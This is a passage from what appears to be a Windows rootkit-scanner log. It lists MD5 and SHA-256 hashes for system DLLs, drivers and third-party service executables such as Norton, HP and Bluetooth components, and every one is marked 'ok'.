12:17:19.0544 0x1aa8 [ 9423E9D355C8D303E76B8CFBD8A5C30C, 220B33F120C2DD937FE4D5664F4B581DC0ACF78D62EB56B7720888F67B9644CC ] C:\Windows\System32\drivers\mrxsmb20.sys
12:17:19.0544 0x1aa8 C:\Windows\System32\drivers\mrxsmb20.sys - ok
12:17:19.0550 0x1aa8 [ C67F8A962B2534224D5908D16D2AD3CE, CAC1821F5E867285638AEE7AE33CE574BCCF16277AC5AD805650B48F7759B4B4 ] C:\Windows\System32\wfapigp.dll
12:17:19.0550 0x1aa8 C:\Windows\System32\wfapigp.dll - ok
12:17:19.0556 0x1aa8 [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] C:\Windows\System32\wkssvc.dll
12:17:19.0556 0x1aa8 C:\Windows\System32\wkssvc.dll - ok
12:17:19.0561 0x1aa8 [ B362181ED3771DC03B4141927C80F801, 69514E5177A0AEA89C27C2234712F9F82E8D8F99E1FD4273898C9324C6FF7472 ] C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
12:17:19.0561 0x1aa8 C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe - ok
12:17:19.0566 0x1aa8 [ 1834B31C749B86DAC233BBBA1C03BC48, 27FCA9196842C0BB53CCAD895870A0EB10D2F8ED67E5486A4437067BD4BC4448 ] C:\Windows\System32\mscms.dll
12:17:19.0567 0x1aa8 C:\Windows\System32\mscms.dll - ok
12:17:19.0572 0x1aa8 [ CC09E0C9A2D89C6E71D093DC8BD121B7, 5F92457E27D817541EBA92FED984D2E6C1E35AD4E4E4CAE0F0778B795C260FAA ] C:\Windows\SysWOW64\crypt32.dll
12:17:19.0572 0x1aa8 C:\Windows\SysWOW64\crypt32.dll - ok
12:17:19.0576 0x1aa8 [ 3AEAA8B561E63452C655DC0584922257, 04C072969B58657602EB0C21CEDF24FCEE14E61B90A0F758F93925EF2C9FC32D ] C:\Windows\System32\pcasvc.dll
12:17:19.0576 0x1aa8 C:\Windows\System32\pcasvc.dll - ok
12:17:19.0581 0x1aa8 [ 6313F223E817CC09AA41811DAA7F541D, D787061043BEEDB9386B048CB9E680E6A88A1CBAE9BD4A8C0209155BFB76C630 ] C:\Windows\System32\snmptrap.exe
12:17:19.0581 0x1aa8 C:\Windows\System32\snmptrap.exe - ok
12:17:19.0585 0x1aa8 [ 10EAB90C1AE8271B5FE5A8930987EE5C, 53E72964AA75526B161F859A509CB046809AE47C65DC998F0E49AC8AED9066EA ] C:\Program Files\Windows Live\Mesh\WLRemoteServiceResource.dll
12:17:19.0585 0x1aa8 C:\Program Files\Windows Live\Mesh\WLRemoteServiceResource.dll - ok
12:17:19.0589 0x1aa8 [ 938F39B50BAFE13D6F58C7790682C010, 902000EE51EFEABAF6A4B30F880AA37083D2232C6FC622CA513C4A823390FEDA ] C:\Windows\SysWOW64\msasn1.dll
12:17:19.0589 0x1aa8 C:\Windows\SysWOW64\msasn1.dll - ok
12:17:19.0594 0x1aa8 [ 68EAAEDF0365168B804E8728368FA946, 1FA25087E8B247B099B729F780DBF24F77FD34F58186A1C94329261CF3D18B8E ] C:\Windows\SysWOW64\wintrust.dll
12:17:19.0594 0x1aa8 C:\Windows\SysWOW64\wintrust.dll - ok
12:17:19.0598 0x1aa8 [ CDBE9690CF2B8409FACAD94FAC9479C9, 8E7FE1A1F3550C479FFD86A77BC9D10686D47F8727025BB891D8F4F0259354C8 ] C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
12:17:19.0599 0x1aa8 C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll - ok
12:17:19.0603 0x1aa8 [ 4004299B7AF4CBFF6540F1798899A11F, 5DD3AE149B7228A769F2FE95355795AC98ACD8CDFB78954A423A357F717203C3 ] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelEvents.dll
12:17:19.0603 0x1aa8 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelEvents.dll - ok
12:17:19.0607 0x1aa8 [ E9A0777DCA9148157E0EF9B71D7DE353, 954A9A1BC2EF83705AFF479DAFD51C18752AEEB2DE7A7DADD1A0E5A1971868DB ] C:\Windows\System32\RdpGroupPolicyExtension.dll
12:17:19.0607 0x1aa8 C:\Windows\System32\RdpGroupPolicyExtension.dll - ok
12:17:19.0613 0x1aa8 [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB, D21CDBC4C2AA0DB5B4455D5108B0CAF4282A2E664B9035708F212CC094569D9D ] C:\Windows\System32\sstpsvc.dll
12:17:19.0613 0x1aa8 C:\Windows\System32\sstpsvc.dll - ok
12:17:19.0619 0x1aa8 [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] C:\Windows\System32\provsvc.dll
12:17:19.0619 0x1aa8 C:\Windows\System32\provsvc.dll - ok
12:17:19.0624 0x1aa8 [ 1249EDE2280F9A1564C946AFDDCD59D5, 53DBE9FF35A229C013F017130ABC77F6632EA740545492CD741778B0E3705025 ] C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
12:17:19.0624 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe - ok
12:17:19.0627 0x1aa8 [ 436A8DCB59CBD6D58A1622F05D62246B, 65051174ED1BF360BF60414CDC2323A62702CEFAE8B9FE266E2009E49C1F5180 ] C:\Program Files\WIDCOMM\Bluetooth Software\btwlelib.dll
12:17:19.0627 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\btwlelib.dll - ok
12:17:19.0631 0x1aa8 [ D233C7FEAE3FAA25F93A9E6B46815ADC, 5330682AE9C08E5F2E30C5E256B91028389BBBDDAA8C38950DF76616FCA854FF ] C:\Windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
12:17:19.0631 0x1aa8 C:\Windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll - ok
12:17:19.0635 0x1aa8 [ 72551A9AE5F68905DFC3CBA0D5242566, 15C273519C3AD1B2AF68F669125AFE607A86A60D680E299631D5E893C3CAA7E7 ] C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
12:17:19.0635 0x1aa8 C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe - ok
12:17:19.0639 0x1aa8 [ EE204969B97263F1228E2D3D27079F62, 6E0533133DC2B63BF99FB8A777A46F8A4E3222848152B45F6F49A8B605F834E8 ] C:\Program Files\WIDCOMM\Bluetooth Software\btins.dll
12:17:19.0639 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\btins.dll - ok
12:17:19.0643 0x1aa8 [ CA9F7888B524D8100B977C81F44C3234, 57F3353F89724147D8AC8B69B12C1303DF26978309776F5F8CCF074526A915D3 ] C:\Windows\SysWOW64\winhttp.dll
12:17:19.0643 0x1aa8 C:\Windows\SysWOW64\winhttp.dll - ok
12:17:19.0648 0x1aa8 [ 03706015DB44368375AEBE6339490E66, 02EB28B5156E320C1EBABC03D37E94EB770A721B99E1DD276F8DC2A50D76C381 ] C:\Windows\System32\netcfgx.dll
12:17:19.0648 0x1aa8 C:\Windows\System32\netcfgx.dll - ok
12:17:19.0652 0x1aa8 [ FB19FC5951A88F3C523E35C2C98D23C0, FF0DB8BF0C68DA0D09272E8181D2B5409C8850BB2F31AEA3AC4CD14C5A420A59 ] C:\Windows\SysWOW64\webio.dll
12:17:19.0652 0x1aa8 C:\Windows\SysWOW64\webio.dll - ok
12:17:19.0655 0x1aa8 [ 5EB6E9C8BE1ACC5830780E0F9A846255, AC5EDC6DBC9CA204584E35878E18F6524DE002CE3D90657C37599790A5DDD1F1 ] C:\Windows\System32\msi.dll
12:17:19.0655 0x1aa8 C:\Windows\System32\msi.dll - ok
12:17:19.0659 0x1aa8 [ 6A638FC4BFDDC4D9B186C28C91BD1A01, 5521F1DC515586777EC4837E0AEAA3E613CC178AF1074031C4D0D0C695A93168 ] C:\Windows\System32\drivers\vwifimp.sys
12:17:19.0659 0x1aa8 C:\Windows\System32\drivers\vwifimp.sys - ok
12:17:19.0662 0x1aa8 [ A6C29DB53ECA94FA8591C5388D604B82, F25E95BA669422286A8FA3A68E0C639A2F06319B6DC8FA641C965CFB27A50BD6 ] C:\Windows\SysWOW64\msi.dll
12:17:19.0663 0x1aa8 C:\Windows\SysWOW64\msi.dll - ok
12:17:19.0666 0x1aa8 [ 7FF15A4F092CD4A96055BA69F903E3E9, 1B594E6D057C632ABB3A8CF838157369024BD6B9F515CA8E774B22FE71A11627 ] C:\Windows\SysWOW64\ws2_32.dll
12:17:19.0667 0x1aa8 C:\Windows\SysWOW64\ws2_32.dll - ok
12:17:19.0670 0x1aa8 [ 529857E4FA4677C56AB130C79508E20C, 18FFD4C499F5642EDFB46EC01D332D28C87283009BE9971A041FA4127A01E074 ] C:\Program Files\WIDCOMM\Bluetooth Software\btwprofpack.dll
12:17:19.0670 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\btwprofpack.dll - ok
12:17:19.0673 0x1aa8 [ 6377051C63D5552A311935C67E9FDFDC, 3FB82988AAB66813567E8DB951D4EE87F156201070F005FDBF52EF998A323E65 ] C:\Windows\SysWOW64\nsi.dll
12:17:19.0673 0x1aa8 C:\Windows\SysWOW64\nsi.dll - ok
12:17:19.0677 0x1aa8 [ 6B669A00A431FF6CDCE67458933F5F0F, 81419EB18BB4EB96E48C99A1D45B0267E779E135427B3AEC872A1A5DD810B23F ] C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
12:17:19.0677 0x1aa8 C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe - ok
12:17:19.0681 0x1aa8 [ 8CD1DEE212E52B9C22E66DBA44991D32, 7FCD0E7964368616434E3B3B080E783658B86524C26F3DB57503414204713E6D ] C:\Windows\SysWOW64\httpapi.dll
12:17:19.0681 0x1aa8 C:\Windows\SysWOW64\httpapi.dll - ok
12:17:19.0685 0x1aa8 [ 6B400F211BEE880A37A1ED0368776BF4, 2F27C6FA96A1C8CBDA467846DA57E63949A7EA37DB094B13397DDD30114295BD ] C:\Windows\System32\cryptsvc.dll
12:17:19.0685 0x1aa8 C:\Windows\System32\cryptsvc.dll - ok
12:17:19.0688 0x1aa8 [ B26F4F737E8F9DF4F31AF6CF31D05820, 394BBBED4EC7FAD4110F62A43BFE0801D4AC56FFAC6C741C69407B26402311C7 ] C:\Windows\System32\dps.dll
12:17:19.0688 0x1aa8 C:\Windows\System32\dps.dll - ok
12:17:19.0692 0x1aa8 [ A6B726DCA228F7878E38368A1BDC68BE, 30E8300B09B876E3D4B2A9215C9CC070EADF915E1268F425B6F8E0596A0D3539 ] C:\Windows\System32\cryptnet.dll
12:17:19.0692 0x1aa8 C:\Windows\System32\cryptnet.dll - ok
12:17:19.0696 0x1aa8 [ BAAFAF9CEAEC0B73C2A3550A01F6CECB, 018CB95A43CEA2063EA24691C71D51EF60D522C21502ABA8AD93876363D4B857 ] C:\Windows\System32\taskschd.dll
12:17:19.0696 0x1aa8 C:\Windows\System32\taskschd.dll - ok
12:17:19.0700 0x1aa8 [ 5893EBDCE371174AC89ECD7731DD6D77, 31CC55F4724CFD95E48954B38C0A04D674399FD243083A816893ED5E5A770086 ] C:\Windows\SysWOW64\pcwum.dll
12:17:19.0700 0x1aa8 C:\Windows\SysWOW64\pcwum.dll - ok
12:17:19.0703 0x1aa8 [ 6A181452D4E240B8ECC7614B9A19BDE9, 3E458A737DA597DF007D278E9D81F2BF259AB4B97A4C188CEDAEA1F144B1074F ] C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
12:17:19.0703 0x1aa8 C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe - ok
12:17:19.0707 0x1aa8 [ 0E2F58F6E698EDCB9E58FAD0CBCD0567, 426FB40A065FEF61980C803EF72D0D326C623340C3AE99CA8AFFDEFB81E8D49D ] C:\Windows\System32\vssapi.dll
12:17:19.0707 0x1aa8 C:\Windows\System32\vssapi.dll - ok
12:17:19.0711 0x1aa8 [ 58F4493BF748A3A89689997B7BD00E95, EC5DEEC73E357C7C87B001275C4E635011A9CF39419F2B86E2C2B8D7E388C551 ] C:\Windows\System32\winhttp.dll
12:17:19.0711 0x1aa8 C:\Windows\System32\winhttp.dll - ok
12:17:19.0714 0x1aa8 [ 603EBD34E216C5654A2D774EAC98D278, ACE0171BB780DB2C1B1A8BF6FA8CF51C529D7E09141FA504C7199AF764FD9A36 ] C:\Windows\System32\webio.dll
12:17:19.0714 0x1aa8 C:\Windows\System32\webio.dll - ok
12:17:19.0719 0x1aa8 [ 287923557447D7E4BDD7E65B1F0F5428, 14D85A0F036F28D77AA9723C3D7E8C4DA9BDFF8A1AD9BEA6FE5756DBF5D00F08 ] C:\Windows\System32\vsstrace.dll
12:17:19.0719 0x1aa8 C:\Windows\System32\vsstrace.dll - ok
12:17:19.0723 0x1aa8 [ 4BD79D03984226DB22D19BBE79369E0E, C29901A0E404D9943921CDF8FEE4D627994C7643BAF08C5E299ACA6EFBF30D36 ] C:\Windows\winsxs\amd64_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.6161_none_044aad0bab1eb146\mfc90u.dll
12:17:19.0723 0x1aa8 C:\Windows\winsxs\amd64_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.6161_none_044aad0bab1eb146\mfc90u.dll - ok
12:17:19.0726 0x1aa8 [ 9028D1621C43DF8DFBD1C76860412A11, A1D48D9B33180BDE50D2FA9BB07E9520B7B7788C39B3AABB4A06AE4B1AACA755 ] C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18201_none_a4d3b9377117c3df\comctl32.dll
12:17:19.0726 0x1aa8 C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18201_none_a4d3b9377117c3df\comctl32.dll - ok
12:17:19.0730 0x1aa8 [ 241AF87821FDA0F5792037B779F49BE0, B3F4FDA27430ACC6D6BC1C3CBD518B9CAE5BA0F22AB8917578A7F16270F94C8B ] C:\Windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcp90.dll
12:17:19.0730 0x1aa8 C:\Windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcp90.dll - ok
12:17:19.0735 0x1aa8 [ D918AF3EA07D248F911F7C6B801AA1E3, B4A8D057519E87BAE47E5318D939E80F8ACD0E09DC07AEE54774BB83F38F93BC ] C:\Windows\winsxs\amd64_microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.6161_none_01c9581e60cbee58\MFC90ENU.DLL
12:17:19.0735 0x1aa8 C:\Windows\winsxs\amd64_microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.6161_none_01c9581e60cbee58\MFC90ENU.DLL - ok
12:17:19.0739 0x1aa8 [ 2BEC76BDCD1BC080210325E7B5094834, 9CD9DF5C974C20F38423B07063A4F44E533B3B4EF39E01AC701C04BFC5F3EC53 ] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
12:17:19.0739 0x1aa8 C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe - ok
12:17:19.0743 0x1aa8 [ 67EC459E42D3081DD8FD34356F7CAFC1, 1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067 ] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\msvcr100.dll
12:17:19.0743 0x1aa8 C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\msvcr100.dll - ok
12:17:19.0747 0x1aa8 [ 344789398EC3EE5A4E00C52B31847946, 3DA5F08E4B46F4E63456AA588D49E39A6A09A97D0509880C00F327623DB6122D ] C:\Windows\System32\IKEEXT.DLL
12:17:19.0747 0x1aa8 C:\Windows\System32\IKEEXT.DLL - ok
12:17:19.0751 0x1aa8 [ 9877087146E094D790BB03ECA0FBC445, 47901D2686794EDE67BC19E80B59A4207623C82486F87A097B7C4BF1EDDA6D00 ] C:\Windows\SysWOW64\irstrtsv.exe
12:17:19.0751 0x1aa8 C:\Windows\SysWOW64\irstrtsv.exe - ok
12:17:19.0754 0x1aa8 [ 6C85719A21B3F62C2C76280F4BD36C7B, 471E333467937720EF9369419EEDE5C2246C976123B437E0AC66F394CF1C056A ] C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
12:17:19.0754 0x1aa8 C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe - ok
12:17:19.0758 0x1aa8 [ 10FB16B50AFFDA6D44588F3C445DC273, 6CDA17DA9B44D11E69F7C6682FA633EA75731623BB21B429A0FE2086ED4495A7 ] C:\Windows\SysWOW64\setupapi.dll
12:17:19.0758 0x1aa8 C:\Windows\SysWOW64\setupapi.dll - ok
12:17:19.0761 0x1aa8 [ 77B5035BC6EDF4D1B6265391AECEE4C0, FE69B715F04446BD42AF1B672E6AC54E954CFE0C847BFD2056CB11CF017B1844 ] C:\Windows\System32\vpnikeapi.dll
12:17:19.0761 0x1aa8 C:\Windows\System32\vpnikeapi.dll - ok
12:17:19.0765 0x1aa8 [ F436E847FA799ECD75AD8C313673F450, 3C8BF3F0C08C7FA8DE5CD9C60AD9D00B742E84EB1FEBEEBA0F7159844BAAA471 ] C:\Windows\SysWOW64\cfgmgr32.dll
12:17:19.0765 0x1aa8 C:\Windows\SysWOW64\cfgmgr32.dll - ok
12:17:19.0769 0x1aa8 [ 2EEFF4502F5E13B1BED4A04CCAD64C08, 209FF1B6D46D1AC99518FCF54F2F726143B2DBF2C5FDA90212FBEF7526F7CBF5 ] C:\Windows\SysWOW64\devobj.dll
12:17:19.0769 0x1aa8 C:\Windows\SysWOW64\devobj.dll - ok
12:17:19.0772 0x1aa8 [ FF5688D309347F2720911D8796912834, 3B0D73C50D40A6F42629B7750F99F656BF5C1C50237D5F98B6C0F2CE5E2DA359 ] C:\Windows\SysWOW64\clbcatq.dll
12:17:19.0772 0x1aa8 C:\Windows\SysWOW64\clbcatq.dll - ok
12:17:19.0776 0x1aa8 [ 4BA84C832E0741A294C4444556DFE993, 2CC888C85887F0F3EB5395075B9C65FF1307D98608BDC1D88ACE4A375DD9DFD9 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe
12:17:19.0776 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe - ok
12:17:19.0780 0x1aa8 [ E3C817F7FE44CC870ECDBCBC3EA36132, D769FAFA2B3232DE9FA7153212BA287F68E745257F1C00FAFB511E7A02DE7ADF ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\msvcp100.dll
12:17:19.0780 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\msvcp100.dll - ok
12:17:19.0783 0x1aa8 [ 7321F18D1F820612ED0E9F2D4B578A7E, 612BD7DE1DFBD100BD6ACB37A38565D88C39842D990D296B9B8E1FB75C3A94E7 ] C:\Windows\SysWOW64\cryptsp.dll
12:17:19.0783 0x1aa8 C:\Windows\SysWOW64\cryptsp.dll - ok
12:17:19.0787 0x1aa8 [ ED8EC63F7522DF4852147C84EC62C36A, 75633011CD28DCBD4834211A9D415F17DE15BFCD80FB9FF6CE25CBBD4E9899AF ] C:\Windows\SysWOW64\rsaenh.dll
12:17:19.0787 0x1aa8 C:\Windows\SysWOW64\rsaenh.dll - ok
12:17:19.0790 0x1aa8 [ BF38660A9125935658CFA3E53FDC7D65, 60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\msvcr100.dll
12:17:19.0791 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\msvcr100.dll - ok
12:17:19.0794 0x1aa8 [ 5997D769CDB108390DCFAEBF442BF816, 0E25CA984C0EEB629184423FAA9BC6D4356DF9A93F281E06DC83B4AC638AEC4A ] C:\Windows\SysWOW64\RpcRtRemote.dll
12:17:19.0794 0x1aa8 C:\Windows\SysWOW64\RpcRtRemote.dll - ok
12:17:19.0798 0x1aa8 [ 6E39DA2FD9F64A723363CD0CE8981DA5, 6B6ED5F7E46DDF974B2C81C621B1939FE22F81018599A86074AC9FBF80C98C69 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccl120u.dll
12:17:19.0798 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccl120u.dll - ok
12:17:19.0802 0x1aa8 [ 53223B673A3FA2F9A4D1C31C8D3F6CD8, B07A12E3ECD5E418A3F99F00C56E7F482F68CADE330E7C079DCCDFFAD2E21299 ] C:\Windows\SysWOW64\dbghelp.dll
12:17:19.0802 0x1aa8 C:\Windows\SysWOW64\dbghelp.dll - ok
12:17:19.0806 0x1aa8 [ 702254574E7E52052DE39408457B7149, 645CA9E88DA21C63710A04A0F54421018DF415A3D612112C71A255C49325C082 ] C:\Windows\SysWOW64\version.dll
12:17:19.0806 0x1aa8 C:\Windows\SysWOW64\version.dll - ok
12:17:19.0810 0x1aa8 [ 8AD77806D336673F270DB31645267293, E23F324913554A23CD043DD27D4305AF62F48C0561A0FC7B7811E55B74B1BE79 ] C:\Windows\System32\nlasvc.dll
12:17:19.0810 0x1aa8 C:\Windows\System32\nlasvc.dll - ok
12:17:19.0813 0x1aa8 [ A543AC1F7138376D778D630A35FCBC4C, 2D824C66A97FC8C39DAFA397CC47495B712D175EEF393486946DA8936BDD466A ] C:\Windows\SysWOW64\psapi.dll
12:17:19.0813 0x1aa8 C:\Windows\SysWOW64\psapi.dll - ok
12:17:19.0817 0x1aa8 [ A580CC1974214DEB330BB3824AE7950A, CE603EC5072031A81B0D0CE384D2FE072E7DFF793494BF1977C108575A293F11 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccvrtrst.dll
12:17:19.0817 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccvrtrst.dll - ok
12:17:19.0821 0x1aa8 [ 1727B2A2F379A32B864C096FA794AADC, 87B77A5DF95F3A1C5ED6DEF820C7E384BEFCBAA2FE1BB4781AC6F777A081E5CC ] C:\Windows\System32\aepic.dll
12:17:19.0821 0x1aa8 C:\Windows\System32\aepic.dll - ok
12:17:19.0824 0x1aa8 [ C6DCD1D11ED6827F05C00773C3E7053C, EA23BE261C9C04F44215D254D7A80FD0AEE84C6F192D0FEE49A7CF74ED3CB1A6 ] C:\Windows\System32\sfc.dll
12:17:19.0824 0x1aa8 C:\Windows\System32\sfc.dll - ok
12:17:19.0827 0x1aa8 [ 68769C3356B3BE5D1C732C97B9A80D6E, FB2D61145980A2899D1B7729184C54070315B0E63C9A22400A76CCD39E00029C ] C:\Windows\System32\drivers\PEAuth.sys
12:17:19.0828 0x1aa8 C:\Windows\System32\drivers\PEAuth.sys - ok
12:17:19.0832 0x1aa8 [ D4FAC263861BAE06971C7F7D0A8EBF15, D494DEF0024288B9CC56EC6B500FF5828144BE9B8E7033340509EC5E68F8DED0 ] C:\Windows\System32\ncsi.dll
12:17:19.0832 0x1aa8 C:\Windows\System32\ncsi.dll - ok
12:17:19.0836 0x1aa8 [ 895C9AB0A855547445C4181195230757, 89BDA385D8CCB75C3D7B1BDFA567AC441A931F4E499C0835FEE9D010343FABB6 ] C:\Windows\System32\sfc_os.dll
12:17:19.0836 0x1aa8 C:\Windows\System32\sfc_os.dll - ok
12:17:19.0840 0x1aa8 [ E7B9D5FF20FFDD4AAE2EF1D1B8C27A37, 689D126B1B42140D5049015E3E324268E6542D4BC6CC14E31D8B89A25B94BAA5 ] C:\Windows\SysWOW64\imagehlp.dll
12:17:19.0840 0x1aa8 C:\Windows\SysWOW64\imagehlp.dll - ok
12:17:19.0843 0x1aa8 [ 2BBF3FDB70B8965DFA0258CBAB41ECCE, 4EFA41765E46E90C6CBDB0DC1E0CD375D7AB3307C477171EBAA6A16AC32E5211 ] C:\Windows\System32\ssdpapi.dll
12:17:19.0843 0x1aa8 C:\Windows\System32\ssdpapi.dll - ok
12:17:19.0847 0x1aa8 [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] C:\Windows\System32\drivers\secdrv.sys
12:17:19.0847 0x1aa8 C:\Windows\System32\drivers\secdrv.sys - ok
12:17:19.0850 0x1aa8 [ BC617A4E1B4FA8DF523A061739A0BD87, 10C4057F6B321EB5237FF619747B74F5401BC17D15A8C7060829E8204A2297F9 ] C:\Windows\System32\seclogon.dll
12:17:19.0850 0x1aa8 C:\Windows\System32\seclogon.dll - ok
12:17:19.0854 0x1aa8 [ AD7FB087A238883D1618F29F7BBBD584, D9541CA4D2AADFEEEC195863133B16C2EC94CA63F842F5646F7834F2D0E85FF3 ] C:\Windows\SysWOW64\ncrypt.dll
12:17:19.0854 0x1aa8 C:\Windows\SysWOW64\ncrypt.dll - ok
12:17:19.0857 0x1aa8 [ CE71B9119A258EDD0A05B37D7B0F92E3, D9310C5BBFE089B8C81E259C462EC1E6D7A7A87FA59FC1F174ED5C58D409AE7A ] C:\Windows\SysWOW64\bcrypt.dll
12:17:19.0857 0x1aa8 C:\Windows\SysWOW64\bcrypt.dll - ok
12:17:19.0861 0x1aa8 [ 2046AA7491DE7EFA4D70E615D9BC9D09, A8763D059AD68D5842C407FA9644E0B129BEF0F63CD87E62B80B05441EDC3489 ] C:\Windows\System32\drivers\Sftfslh.sys
12:17:19.0861 0x1aa8 C:\Windows\System32\drivers\Sftfslh.sys - ok
12:17:19.0864 0x1aa8 [ E8449FE262D7406BCB2AC2A45C53EC5F, 6C118C9FB26404D1943824CF3990F36E12986547FFACB7CC0DF975A913065D78 ] C:\Windows\SysWOW64\bcryptprimitives.dll
12:17:19.0865 0x1aa8 C:\Windows\SysWOW64\bcryptprimitives.dll - ok
12:17:19.0868 0x1aa8 [ 1097F3035BAF46CED8B332B3564C5108, C69781683CA963A1335780DABBBC60E2C3CEF0888738D3425D358D12E8D0AF58 ] C:\Windows\SysWOW64\gpapi.dll
12:17:19.0868 0x1aa8 C:\Windows\SysWOW64\gpapi.dll - ok
12:17:19.0872 0x1aa8 [ 4EE3A812A8DB2CA32B2392A7EA49427C, 6A542DAA27E925D721A5D95205E6C24F5358D4D1F65C605A2B6A0CCA86262BAE ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvc.dll
12:17:19.0872 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvc.dll - ok
12:17:19.0874 0x1aa8 [ 0E0446BC4D51BE4263ACB7E33491191C, 2AD039FB440560658C4E06F67CC192EF71577EF3FF789A43C08430CE5EAE5A70 ] C:\Windows\System32\drivers\Sftplaylh.sys
12:17:19.0874 0x1aa8 C:\Windows\System32\drivers\Sftplaylh.sys - ok
12:17:19.0878 0x1aa8 [ D6B65DEB5E34936C6576873D1875385D, 3AF8E9FD49FF36BE1A7812D3823B46B602F43587B429840E80B32D5BD2A97AD9 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccipc.dll
12:17:19.0878 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccipc.dll - ok
12:17:19.0882 0x1aa8 [ 39B1D0A636A400304565D4521FAD6D77, 1F01DB35B5A477AA7A77585C9304E6B5F3E67807531305BCA93A7F494CED8F59 ] C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
12:17:19.0882 0x1aa8 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe - ok
12:17:19.0886 0x1aa8 [ 7B851A8018B1EA00A69707A390004884, DAE654713EF1DC66C8C2D27752B659081794063A7D522D1F680AA9A6E7FBA9FD ] C:\Windows\SysWOW64\cryptnet.dll
12:17:19.0886 0x1aa8 C:\Windows\SysWOW64\cryptnet.dll - ok
12:17:19.0890 0x1aa8 [ 6F8E3B7B70E1BBA871212940C1FBDF60, 3F9D4EE64E4210340C6FEE0DE81BFE3C613DDBE608EC09D63817D24CE24BFC5E ] C:\Windows\SysWOW64\SensApi.dll
12:17:19.0890 0x1aa8 C:\Windows\SysWOW64\SensApi.dll - ok
12:17:19.0894 0x1aa8 [ 4C39358EBDD2FFCD9132A30E1EC31E16, 06918CF99AD26CD6CF106881C0D5BDB212DC0BAC4549805C9F5906E3D03D152C ] C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcp90.dll
12:17:19.0895 0x1aa8 C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcp90.dll - ok
12:17:19.0898 0x1aa8 [ 1E8D06AAE74FED674C1156B3FEA911C2, C1999BA9E436F9E0B9302DC82DF8B214E66372899FD4C0C60C56EE5340BADB9F ] C:\Windows\SysWOW64\Faultrep.dll
12:17:19.0898 0x1aa8 C:\Windows\SysWOW64\Faultrep.dll - ok
